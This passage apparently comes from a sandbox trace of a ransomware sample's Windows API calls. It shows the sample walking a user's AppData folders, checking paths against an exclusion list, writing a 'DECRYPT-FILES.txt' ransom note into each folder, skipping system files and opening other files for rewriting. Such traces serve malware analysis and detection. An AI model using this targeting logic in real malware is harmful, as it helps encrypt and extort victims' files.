ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Speech", cAlternateFileName="")) returned 1 [0078.528] lstrcmpW (lpString1="Speech", lpString2=".") returned 1 [0078.528] lstrcmpW (lpString1="Speech", lpString2="..") returned 1 [0078.528] lstrcatW (in: lpString1="Speech", lpString2="\\" | out: lpString1="Speech\\") returned="Speech\\" [0078.528] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Speech\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\" [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\Program Files") returned 0x0 [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch=":\\Windows") returned 0x0 [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\Games\\") returned 0x0 [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\All Users") returned 0x0 [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="AhnLab") returned 0x0 [0078.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.528] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned 63 [0078.528] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.528] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\\\jkbimi8.tmp") returned 75 [0078.528] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\speech\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0078.529] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned 63 [0078.529] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.529] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\\\DECRYPT-FILES.txt") returned 81 [0078.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\speech\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0078.530] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0078.531] CloseHandle (hObject=0x44c) returned 1 [0078.531] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned 63 [0078.531] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\*" [0078.531] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0078.531] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.531] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.532] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.532] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.532] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab019420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.532] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.532] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab019420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.532] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.532] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.532] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.532] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.532] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.532] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.532] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.532] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.532] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.532] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.532] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.532] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.532] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.532] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.532] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.532] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned 63 [0078.532] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.532] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\" [0078.532] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\jkbimi8.tmp" [0078.532] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\speech\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.533] CloseHandle (hObject=0x0) returned 0 [0078.533] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.533] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab019420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.533] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0078.533] CloseHandle (hObject=0x448) returned 1 [0078.533] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0078.533] lstrcmpW (lpString1="SystemCertificates", lpString2=".") returned 1 [0078.533] lstrcmpW (lpString1="SystemCertificates", lpString2="..") returned 1 [0078.533] lstrcatW (in: lpString1="SystemCertificates", lpString2="\\" | out: lpString1="SystemCertificates\\") returned="SystemCertificates\\" [0078.533] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="SystemCertificates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" [0078.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Program Files") returned 0x0 [0078.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch=":\\Windows") returned 0x0 [0078.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Games\\") returned 0x0 [0078.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.534] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.534] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.534] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.534] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\All Users") returned 0x0 [0078.534] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.534] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.534] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.534] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="AhnLab") returned 0x0 [0078.534] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.534] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 75 [0078.534] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.534] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\jkbimi8.tmp") returned 87 [0078.534] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0078.534] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 75 [0078.534] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.535] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\DECRYPT-FILES.txt") returned 93 [0078.535] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0078.535] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0078.536] CloseHandle (hObject=0x44c) returned 1 [0078.536] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 75 [0078.536] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0078.536] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0078.537] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.537] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.537] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.537] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.537] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab019420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.537] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.537] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab019420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.537] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.537] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.537] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.537] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.537] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.537] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.537] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.537] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.537] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.537] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.537] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.537] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.537] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.537] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.537] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.537] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 75 [0078.537] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.537] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" [0078.537] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\jkbimi8.tmp" [0078.537] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.538] CloseHandle (hObject=0x0) returned 0 [0078.538] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.538] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0078.538] lstrcmpW (lpString1="My", lpString2=".") returned 1 [0078.538] lstrcmpW (lpString1="My", lpString2="..") returned 1 [0078.538] lstrcatW (in: lpString1="My", lpString2="\\" | out: lpString1="My\\") returned="My\\" [0078.538] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="My\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" [0078.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Program Files") returned 0x0 [0078.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch=":\\Windows") returned 0x0 [0078.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Games\\") returned 0x0 [0078.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\All Users") returned 0x0 [0078.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 